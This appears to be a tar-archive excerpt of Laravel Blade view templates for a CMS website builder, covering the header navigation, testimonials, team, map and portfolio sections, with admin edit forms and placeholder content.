</div> </div> <div class="item"> <div class="testimonial-item"> <div class="img"> <img src="{{ asset('uploads/img/dummy/80x80.jpg') }}" alt="Testimonial image" class="img-fluid"> </div> <div class="body"> <h5>Nitin Khajotia</h5> <span>New Customer</span> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <div class="rating"> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> </div> </div> <span class="quote-icon"> <i class="fas fa-quote-right"></i> </span> </div> </div> </div> @endif @endif </div> </section> <!--// Testimonial Section End //--> @if(Auth::user()) @can('section check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="testimonial.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="testimonial.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_testimonial') }} </button> </form> </div> </div> @endcan @endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/header/header-style1.blade.php����������������������������������������������0000644�����������������00000046042�14765366572�0017060 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!--// Header Start //--> <header class="header fixed-top" id="header"> <div id="nav-menu-wrap"> <div class="container"> <nav class="navbar navbar-expand-lg p-0"> @isset ($header_image_style1) <a class="navbar-brand" title="Home" href="{{ url('/') }}"> @if (!empty($header_image_style1->section_image)) <img src="{{ asset('uploads/img/general/'.$header_image_style1->section_image) }}" alt="Logo White" class="img-fluid logo-transparent"> @endif @if (!empty($header_image_style1->section_image_2)) <img src="{{ asset('uploads/img/general/'.$header_image_style1->section_image_2) }}" alt="Logo Black" class="img-fluid logo-normal"> @endif </a> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <a class="navbar-brand" title="Home" href="#"> <img src="{{ asset('uploads/img/dummy/your-logo.jpg') }}" alt="Logo White" class="img-fluid logo-transparent"> <img src="{{ asset('uploads/img/dummy/your-logo.jpg') }}" alt="Logo Black" class="img-fluid logo-normal"> </a> @endif @endisset @if(Auth::user()) @can('setting check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="header-image.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-edit text-white"></i> </button> </form> @endcan @endif <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#fixedNavbar" aria-controls="fixedNavbar" aria-expanded="false" aria-label="Toggle navigation"> <span class="togler-icon-inner"> <span class="line-1"></span> <span class="line-2"></span> <span class="line-3"></span> </span> </button> <div class="collapse navbar-collapse main-menu justify-content-end" id="fixedNavbar"> <ul class="navbar-nav"> @if (is_countable($menus) && count($menus) > 0) @foreach ($menus as $menu) @if ($menu->submenus->count() > 0) <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" id="{{ $menu->menu_name }}DropdownMenu" href="#" role="button" data-bs-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ $menu->menu_name }} </a> @if ($menu->submenus->count() > 0) <div class="dropdown-menu" aria-labelledby="{{ $menu->menu_name }}DropdownMenu"> @foreach ($menu->submenus as $submenu) <a class="dropdown-item" href="@if (!empty($submenu->uri)) @if ((session()->has('language_name_from_dropdown') && $language->language_code == session()->get('language_code_from_dropdown')) || !session()->has('language_name_from_dropdown') ) {{ url($submenu->uri) }} @elseif (session()->has('language_name_from_dropdown')) {{ url($submenu->uri) }} @endif @elseif (!empty($submenu->url)) {{ $submenu->url }} @else # @endif">{{ $submenu->submenu_name }}</a> @endforeach @unset ($submenu) </div> @endif </li> @else <li class="nav-item"> <a class="nav-link menu-link" href="@if (!empty($menu->uri)) @if ((session()->has('language_name_from_dropdown') && $language->language_code == session()->get('language_code_from_dropdown')) || !session()->has('language_name_from_dropdown') ) {{ url($menu->uri) }} @elseif (session()->has('language_name_from_dropdown')) {{ url($menu->uri) }} @endif @elseif (!empty($menu->url)) {{ $menu->url }} @else # @endif">{{ $menu->menu_name }}</a> </li> @endif @endforeach @unset ($menu) @if (is_countable($display_dropdowns) && count($display_dropdowns) > 0) @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="#" id="langDropdownMenu" role="button" data-bs-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> @if (session()->has('language_name_from_dropdown')) {{ session()->get('language_name_from_dropdown') }} @else {{ $language->language_name }} @endif </a> <div class="dropdown-menu" aria-labelledby="langDropdownMenu"> @foreach ($display_dropdowns as $display_dropdown) <a class="dropdown-item" href="{{ url('language/set-locale/'.$display_dropdown->id.'/'.$modified_url) }}">{{ $display_dropdown->language_name }}</a> @endforeach @unset ($display_dropdown) </div> </li> @endif <li class="nav-item"> <a class="nav-link" href="#"> @if (Auth::user()) @can('menu check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="menu.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-edit text-white"></i> </button> </form> @endcan @endif </a> </li> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="#" id="homeDropdownMenu" role="button" data-bs-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> Home </a> <div class="dropdown-menu" aria-labelledby="homeDropdownMenu"> <a class="dropdown-item" href="#">Home Default</a> <a class="dropdown-item" href="#">Home Particles</a> <a class="dropdown-item" href="#">Home Slider</a> <a class="dropdown-item" href="#">Home Video</a> </div> </li> <li class="nav-item"> <a class="nav-link menu-link" href="#">About Us</a> </li> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="#" id="serviceDropdownMenu" role="button" data-bs-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> Services </a> <div class="dropdown-menu" aria-labelledby="serviceDropdownMenu"> <a class="dropdown-item" href="#">Services</a> <a class="dropdown-item" href="#">Web Design</a> <a class="dropdown-item" href="#">Graphic Design</a> <a class="dropdown-item" href="#">UI/UX Design</a> <a class="dropdown-item" href="#">Content Writing</a> <a class="dropdown-item" href="#">Scripts & Plugin</a> <a class="dropdown-item" href="#">Digital Marketing</a> </div> </li> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="#" id="pageDropdownMenu" role="button" data-bs-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> Pages </a> <div class="dropdown-menu" aria-labelledby="pageDropdownMenu"> <a class="dropdown-item" href="#">Faq</a> <a class="dropdown-item" href="#">Gallery</a> <a class="dropdown-item" href="#">Team</a> <a class="dropdown-item" href="#">Portfolio</a> <a class="dropdown-item" href="#">Plan</a> <a class="dropdown-item" href="#">Career</a> </div> </li> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="#" id="blogDropdownMenu" role="button" data-bs-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> Blogs </a> <div class="dropdown-menu" aria-labelledby="blogDropdownMenu"> <a class="dropdown-item" href="#">Blog Grid</a> <a class="dropdown-item" href="#">Blog Single</a> </div> </li> <li class="nav-item"> <a class="nav-link menu-link" href="#">Contact</a> </li> @if (is_countable($display_dropdowns) && count($display_dropdowns) > 0) @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="#" id="langDropdownMenu" role="button" data-bs-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> @if (session()->has('language_name_from_dropdown')) {{ session()->get('language_name_from_dropdown') }} @else {{ $language->language_name }} @endif </a> <div class="dropdown-menu" aria-labelledby="langDropdownMenu"> @foreach ($display_dropdowns as $display_dropdown) <a class="dropdown-item" href="{{ url('language/set-locale/'.$display_dropdown->id.'/'.$modified_url) }}">{{ $display_dropdown->language_name }}</a> @endforeach @unset ($display_dropdown) </div> </li> @endif <li class="nav-item"> <a class="nav-link" href="#"> @if (Auth::user()) @can('menu check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="menu.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-edit text-white"></i> </button> </form> @endcan @endif </a> </li> @endif @endif @isset ($external_url) <li class="nav-item navbar-btn-resp d-flex align-items-center"> @if (!empty($external_url->button_name)) <a href="{{ $external_url->button_url }}" class="primary-btn"> <span class="text">{{ $external_url->button_name }}</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> @endif @if (Auth::user()) @can('setting check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="external-url.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-edit text-white"></i> </button> </form> @endcan @endif </li> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <li class="nav-item navbar-btn-resp d-flex align-items-center"> <a href="#" class="primary-btn"> <span class="text">Get Started</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> @if (Auth::user()) @can('setting check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="external-url.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-edit text-white"></i> </button> </form> @endcan @endif </li> @endif @endisset </ul> </div> </nav> </div> </div> </header> <!--// Header End //--> ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/team/team-style2.blade.php��������������������������������������������������0000644�����������������00000031262�14765366572�0016253 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('team check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Team Section Start //--> <section class="section" id="team"> <div class="container"> <div class="row"> <div class="col-md-12"> @if (is_countable($team_count_categories) && count($team_count_categories) > 0) <div class="text-center mb-5 custom-category-link"> <a href="{{ url($page_builder->page_uri) }}" class="current mb-2">{{ __('frontend.all_teams') }}</a> @foreach ($team_count_categories as $team_count_category) @if (isset($team_count_category->team_category->team_category_slug)) <a class="mb-2" href="{{ route('default-team-category-index', $team_count_category->team_category->team_category_slug) }}">{{$team_count_category->team_category->category_name }} ({{ $team_count_category->category_count }})</a> @endif @endforeach @unset ($team_count_category) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="text-center mb-5 custom-category-link"> <a href="#" class="link-dark">Management</a> <a href="#" class="link-secondary">Departments</a> <a href="#" class="link-secondary">Business Development</a> <a href="#" class="link-secondary">Research & Development</a> </div> @endif @endif </div> </div> @if (is_countable($teams_paginate_style) && count($teams_paginate_style) > 0) <div class="row"> @foreach ($teams_paginate_style as $item) <div class="col-md-6 col-lg-4 wow fadeInDown" data-wow-duration="0.7s" data-wow-delay="0.{{ $loop->iteration }}s"> <div class="team-card"> @if(Auth::user()) @can('team check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="team.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif @if (!empty($item->section_image)) <div class="img"> <img class="custom-max-width-200" src="{{ asset('uploads/img/team/'.$item->section_image) }}" alt="Team image"> </div> @endif <div class="body"> <div class="text"> <h5>{{ $item->name }}</h5> <p>{{ $item->job }}</p> </div> <div class="social"> <ul> @if (!empty($item->facebook_url)) <li><a href="{{ $item->facebook_url }}"><i class="fab fa-facebook-f"></i></a></li> @endif @if (!empty($item->twitter_url)) <li><a href="{{ $item->twitter_url }}"><i class="fab fa-twitter"></i></a></li> @endif @if (!empty($item->instagram_url)) <li><a href="{{ $item->instagram_url }}"><i class="fab fa-instagram"></i></a></li> @endif @if (!empty($item->youtube_url)) <li><a href="{{ $item->youtube_url }}"><i class="fab fa-youtube"></i></a></li> @endif @if (!empty($item->linkedin_url)) <li><a href="{{ $item->linkedin_url }}"><i class="fab fa-linkedin"></i></a></li> @endif </ul> </div> </div> </div> </div> @endforeach @unset ($item) </div> <div class="row mt-5"> <div class="col-xl-12"> <div class="easier-pagination-container"> {{ $teams_paginate_style->links() }} </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-md-6 col-lg-4 wow fadeInDown" data-wow-duration="0.7s" data-wow-delay="0.1s"> <div class="team-card"> <div class="img"> <img src="{{ asset('uploads/img/dummy/200x200.jpg') }}" alt="Team image"> </div> <div class="body"> <div class="text"> <h5>George Avenue</h5> <p>Web Designer</p> </div> <div class="social"> <ul> <li><a href="javascript:void(0)"><i class="fab fa-facebook-f"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-twitter"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-instagram"></i></a></li> </ul> </div> </div> </div> </div> <div class="col-md-6 col-lg-4 wow fadeInDown" data-wow-duration="0.7s" data-wow-delay="0.2s"> <div class="team-card"> <div class="img"> <img src="{{ asset('uploads/img/dummy/200x200.jpg') }}" alt="Team image"> </div> <div class="body"> <div class="text"> <h5>Dominick A. Gray</h5> <p>App Developer</p> </div> <div class="social"> <ul> <li><a href="javascript:void(0)"><i class="fab fa-facebook-f"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-twitter"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-instagram"></i></a></li> </ul> </div> </div> </div> </div> <div class="col-md-6 col-lg-4 wow fadeInDown" data-wow-duration="0.7s" data-wow-delay="0.3s"> <div class="team-card"> <div class="img"> <img src="{{ asset('uploads/img/dummy/200x200.jpg') }}" alt="Team image"> </div> <div class="body"> <div class="text"> <h5>Michael L. Lloyd</h5> <p>UI Designer</p> </div> <div class="social"> <ul> <li><a href="javascript:void(0)"><i class="fab fa-facebook-f"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-twitter"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-instagram"></i></a></li> </ul> </div> </div> </div> </div> </div> @endif @endif </div> </section> <!--// Team Section End //--> @if(Auth::user()) @can('team check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="team.index"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="team.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_team') }} </button> </form> </div> </div> @endcan @endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/team/team-style1.blade.php��������������������������������������������������0000644�����������������00000033214�14765366572�0016251 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('team check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Team Section Start //--> <section class="section" id="team"> <div class="container"> @if(Auth::user()) @can('team check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif @isset ($team_section_style1) <div class="row justify-content-center"> <div class="col-lg-6"> <div class="section-heading"> <span>@php echo html_entity_decode($team_section_style1->section_title); @endphp</span> <h2>@php echo html_entity_decode($team_section_style1->title); @endphp</h2> </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row justify-content-center"> <div class="col-lg-6"> <div class="section-heading"> <span>Team</span> <h2>Our Team</h2> </div> </div> </div> @endif @endisset @if (is_countable($teams_style1) && count($teams_style1) > 0) <div class="row"> @foreach ($teams_style1 as $item) <div class="col-md-6 col-lg-4 wow fadeInDown" data-wow-duration="0.7s" data-wow-delay="0.{{ $loop->iteration }}s"> <div class="team-card"> @if(Auth::user()) @can('team check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="team.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif @if (!empty($item->section_image)) <div class="img"> <img class="custom-max-width-200" src="{{ asset('uploads/img/team/'.$item->section_image) }}" alt="Team image"> </div> @endif <div class="body"> <div class="text"> <h5>{{ $item->name }}</h5> <p>{{ $item->job }}</p> </div> <div class="social"> <ul> @if (!empty($item->facebook_url)) <li><a href="{{ $item->facebook_url }}"><i class="fab fa-facebook-f"></i></a></li> @endif @if (!empty($item->twitter_url)) <li><a href="{{ $item->twitter_url }}"><i class="fab fa-twitter"></i></a></li> @endif @if (!empty($item->instagram_url)) <li><a href="{{ $item->instagram_url }}"><i class="fab fa-instagram"></i></a></li> @endif @if (!empty($item->youtube_url)) <li><a href="{{ $item->youtube_url }}"><i class="fab fa-youtube"></i></a></li> @endif @if (!empty($item->linkedin_url)) <li><a href="{{ $item->linkedin_url }}"><i class="fab fa-linkedin"></i></a></li> @endif </ul> </div> </div> </div> </div> @endforeach @unset ($item) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-md-6 col-lg-4 wow fadeInDown" data-wow-duration="0.7s" data-wow-delay="0.1s"> <div class="team-card"> <div class="img"> <img src="{{ asset('uploads/img/dummy/200x200.jpg') }}" alt="Team image"> </div> <div class="body"> <div class="text"> <h5>George Avenue</h5> <p>Web Designer</p> </div> <div class="social"> <ul> <li><a href="javascript:void(0)"><i class="fab fa-facebook-f"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-twitter"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-instagram"></i></a></li> </ul> </div> </div> </div> </div> <div class="col-md-6 col-lg-4 wow fadeInDown" data-wow-duration="0.7s" data-wow-delay="0.2s"> <div class="team-card"> <div class="img"> <img src="{{ asset('uploads/img/dummy/200x200.jpg') }}" alt="Team image"> </div> <div class="body"> <div class="text"> <h5>Dominick A. Gray</h5> <p>App Developer</p> </div> <div class="social"> <ul> <li><a href="javascript:void(0)"><i class="fab fa-facebook-f"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-twitter"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-instagram"></i></a></li> </ul> </div> </div> </div> </div> <div class="col-md-6 col-lg-4 wow fadeInDown" data-wow-duration="0.7s" data-wow-delay="0.3s"> <div class="team-card"> <div class="img"> <img src="{{ asset('uploads/img/dummy/200x200.jpg') }}" alt="Team image"> </div> <div class="body"> <div class="text"> <h5>Michael L. Lloyd</h5> <p>UI Designer</p> </div> <div class="social"> <ul> <li><a href="javascript:void(0)"><i class="fab fa-facebook-f"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-twitter"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-instagram"></i></a></li> </ul> </div> </div> </div> </div> </div> @endif @endif <div class="row mt-5"> @isset ($team_section_style1) <div class="col-md-12 text-center"> <a href="{{ $team_section_style1->button_url }}" class="primary-btn"> <span class="text">{{ $team_section_style1->button_name }}</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="col-md-12 text-center"> <a href="javascript:void(0)" class="primary-btn"> <span class="text">Get Started</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> </div> @endif @endisset </div> </div> </section> <!--// Team Section End //--> @if(Auth::user()) @can('team check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="team.index"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="team.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_team') }} </button> </form> </div> </div> @endcan @endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/map/map-style1.blade.php����������������������������������������������������0000644�����������������00000006443�14765366572�0015733 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('section check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif @isset ($map_section_style1) @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <!--//Google Map Section Start //--> <div class="google-map"> <iframe src="{{ $map_section_style1->map_iframe }}" allowfullscreen="" aria-hidden="false" tabindex="0"></iframe> </div> <!--// Google Map Section End //--> @else @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <!--//Google Map Section Start //--> <div class="google-map"> <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3209.9276396281293!2d-82.32472778472037!3d36.43513238002549!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x885a86bd9ebc8df3%3A0xa66b715302e6215a!2s381%20Allison%20Rd%2C%20Piney%20Flats%2C%20TN%2037686%2C%20Amerika%20Birle%C5%9Fik%20Devletleri!5e0!3m2!1str!2str!4v1607771147842!5m2!1str!2str" allowfullscreen="" aria-hidden="false" tabindex="0"></iframe> </div> <!--// Google Map Section End //--> @endif @endisset @if(Auth::user()) @can('section check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="map.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.edit_map') }} </button> </form> </div> </div> @endcan @endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/portfolio/portfolio-style1.blade.php����������������������������������������0000644�����������������00000044525�14765366572�0020436 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('portfolio check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// My Works Start //--> <section class="section bg-primary-light" id="porfolio"> <div class="container"> @if(Auth::user()) @can('portfolio check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row"> @isset ($portfolio_section_style1) <div class="col-md-6"> <div class="section-heading-left"> <span>@php echo html_entity_decode($portfolio_section_style1->section_title); @endphp</span> <h2>@php echo html_entity_decode($portfolio_section_style1->title); @endphp</h2> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="col-md-6"> <div class="section-heading-left"> <span>Works</span> <h2>Our Works</h2> </div> </div> @endif @endisset @if (is_countable($portfolios_style1) && count($portfolios_style1) > 0) <div class="col-md-6"> <div class="portfolio-filter"> @foreach ($portfolio_count_categories as $portfolio_category) <a href="#" data-portfolio-filter=".{{ $portfolio_category->portfolio_category->portfolio_category_slug }}">{{ $portfolio_category->portfolio_category->category_name }}</a> @endforeach </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="col-md-6"> <div class="portfolio-filter"> <a href="#" data-portfolio-filter="*" class="current">All</a> <a href="#" data-portfolio-filter=".mockup">Mockup</a> <a href="#" data-portfolio-filter=".ui">UI/UX</a> </div> </div> @endif @endif </div> @if (is_countable($portfolios_style1) && count($portfolios_style1) > 0) <div class="row portfolio-grid" id="portfolio-masonry-wrap"> @foreach ($portfolios_style1 as $item) <div class="col-md-6 col-lg-4 portfolio-item {{ $item->portfolio_category->portfolio_category_slug }}"> @if(Auth::user()) @can('portfolio check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="portfolio.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="portfolio-item-inner"> @if (!empty($item->section_image)) <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/portfolio/'.$item->section_image) }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/portfolio/'.$item->section_image) }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> @endif <div class="body"> <div class="portfolio-details"> <span>{{ $item->portfolio_category->category_name }}</span> <h5>{{ $item->title }}</h5> </div> @if (!empty($item->url)) <a href="{{ $item->url }}" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> @else <a href="{{ route('default-portfolio-detail-show', ['portfolio_slug' => $item->portfolio_slug]) }}" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> @endif </div> </div> </div> @endforeach @unset ($item) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row portfolio-grid" id="portfolio-masonry-wrap"> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Card Mockup</h5> </div> <a href="#" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Mockup Box</h5> </div> <a href="#" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item mockup"> <div class="portfolio-item-inner"> <div class="portfolio-item-img"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Portfolio image" class="img-fluid"> <a href="{{ asset('uploads/img/dummy/600x600.jpg') }}" class="portfolio-zoom-link"> <i class="fas fa-search"></i> </a> </div> <div class="body"> <div class="portfolio-details"> <span>Mockup</span> <h5>Coffee Mockup</h5> </div> <a href="#" class="portfolio-link"> <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-md-6 col-lg-4 portfolio-item mockup"> 